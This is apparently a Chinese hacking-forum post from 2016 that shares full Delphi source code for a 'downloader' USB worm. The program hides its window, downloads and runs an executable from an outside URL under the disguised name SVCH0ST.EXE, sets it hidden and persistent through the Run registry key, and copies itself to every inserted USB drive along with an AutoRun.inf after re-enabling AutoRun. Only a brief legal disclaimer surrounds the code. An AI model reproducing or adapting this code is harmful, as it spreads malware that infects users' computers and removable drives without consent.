HanDs
管理员

[Delphi文章] 下载者U盘传染源码 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

unit Un_Main;


interface


uses
     Windows, Messages, SysUtils,Forms,IniFiles;
type
     TFrm_Main = class(TForm)
     procedure FormCreate(Sender: TObject);
     procedure FormClose(Sender: TObject; var Action: TCloseAction);
     private
     procedure WMDeviceChange(var Msg: TMessage); message WM_DEVICECHANGE;
     public
     { Public declarations }
     end;
const
         exefile = 'SVCH0ST.EXE';
         Buffer = 'http://www.888.com/hello.exe';
         DBT_DEVICEARRIVAL = $8000;     // system detected a new device
         DBT_DEVICEREMOVECOMPLETE = $8004;     // device is gone
         DBT_DEVTYP_VOLUME = $00000002;     // logical volume
         DBTF_MEDIA = $0001;     // media comings and goings
type
    PDEV_BROADCAST_HDR = ^TDEV_BROADCAST_HDR;
    TDEV_BROADCAST_HDR = packed record
     dbch_size : DWORD;
     dbch_devicetype : DWORD;
     dbch_reserved : DWORD;
    end;
     PDEV_BROADCAST_VOLUME = ^TDEV_BROADCAST_VOLUME;
     TDEV_BROADCAST_VOLUME = packed record
         dbcv_size : DWORD;
         dbcv_devicetype : DWORD;
         dbcv_reserved : DWORD;
         dbcv_unitmask : DWORD;
         dbcv_flags : WORD;
     end;


function UrlDownLoadToFile(Caller,URL,FileName: PAnsiChar;Reserved: LongWord;
                                     StatusCB: Pointer): LongWord;
                                     stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';


function WinExec(lpCmdline: PAnsiChar; uCmdShow: LongWord): LongWord;
                         stdcall; external 'kernel32.dll' name 'WinExec';


var
     Frm_Main: TFrm_Main;
     exefull:string;
implementation


{$R *.dfm}


function SetRegValue(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
     result := false;
     RegCreateKey(key,PChar(subkey),regkey);
     if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
     result := true;
     RegCloseKey(regkey);
end;


procedure Startup(var TheName:string);
begin
     SetRegValue(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun','SVCH0ST',TheName);
     UrlDownloadToFile(nil, PChar(Buffer), PChar(TheName), 0, nil);
     SetFileAttributes(PChar(TheName),FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM);
     messagebox(0,'文件下载成功!','成功',MB_OK);
     WinExec(PChar(TheName), SW_SHOWDEFAULT);
     //Sleep(500);
     //DeleteMe;
     //freemem(@path,256);
end;


procedure TFrm_Main.WMDeviceChange(var Msg: TMessage);
var
     lpdb : PDEV_BROADCAST_HDR;
     lpdbv : PDEV_BROADCAST_VOLUME;
     unitmask:DWORD;
     i:integer;
     MyIni:TIniFile;
     s:Hkey;
     value:dword ;
     inifile:string;
begin
     lpdb := PDEV_BROADCAST_HDR(Msg.LParam);
     case Msg.WParam of
     DBT_DEVICEARRIVAL ://有设备安装完毕


     if lpdb.dbch_devicetype=DBT_DEVTYP_VOLUME then
     begin
         lpdbv := PDEV_BROADCAST_VOLUME(lpdb);
         unitmask:=lpdbv.dbcv_unitmask;//取得设备的盘符
         for i:=0 to 25 do //遍历磁盘
         begin
             if Boolean(unitmask and $1)then//看该驱动器的状态是否发生了变化
             break;
             unitmask := unitmask shr 1;
         end;
         if fileexists(exefull) then     //向u盘拷文件
         begin
         copyfile(PChar(exefull),Pchar(char(i+65) + ':' + exefile),false);
         FileSetAttr(char(i+65) + ':' + exefile,$00000003);
         end;
         inifile:=char(i+65)+':AutoRun.inf';//ini文件
         RegOpenKeyEx(HKEY_CURRENT_USER, 'SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer', 0, KEY_ALL_ACCESS, s);
         value:=0;
         RegSetValueEx(s,'NoDriveTypeAutoRun',0, REG_DWORD,@value, sizeof(value));
         RegCloseKey(s);
         if fileexists(inifile) then
         begin
         FileSetAttr(inifile,$00000000);
         DeleteFile(inifile);
         end;
         MyIni := TIniFile.Create(inifile);
         MyIni.WriteString('AutoRun', 'open',exefile);
         FileSetAttr(inifile,$00000003);
     end;
    end;
end;


procedure TFrm_Main.FormCreate(Sender: TObject);
var
s:hkey;
value:array[0..255]of char;
size:cardinal;
path:array[0..255] of char;
begin
     Application.ShowMainForm:=False;
     getsystemdirectory(path,120);
     exefull := strpas(path) + '' + exefile;
     size:=256;
     RegOpenKeyEx(HKEY_LOCAL_MACHINE,'SoftwareMicrosoftWindowsCurrentVersionRun',0,KEY_ALL_ACCESS,s);
     RegQueryValueEx(s,'SVCH0ST',nil,nil,@value,@size);
     RegCloseKey(s);
     //文件存在且有自启动
     if fileexists('C:WINDOWSsystem32SVCH0ST.EXE') and (UpperCase(value) = UpperCase(exefull)) then
     messagebox(0,'自启动成功!','成功',MB_OK)
     else
     Startup(exefull);//下载执行函数
end;


procedure TFrm_Main.FormClose(Sender: TObject; var Action: TCloseAction);
begin
     Application.Terminate;
end;


end.


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
下载
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复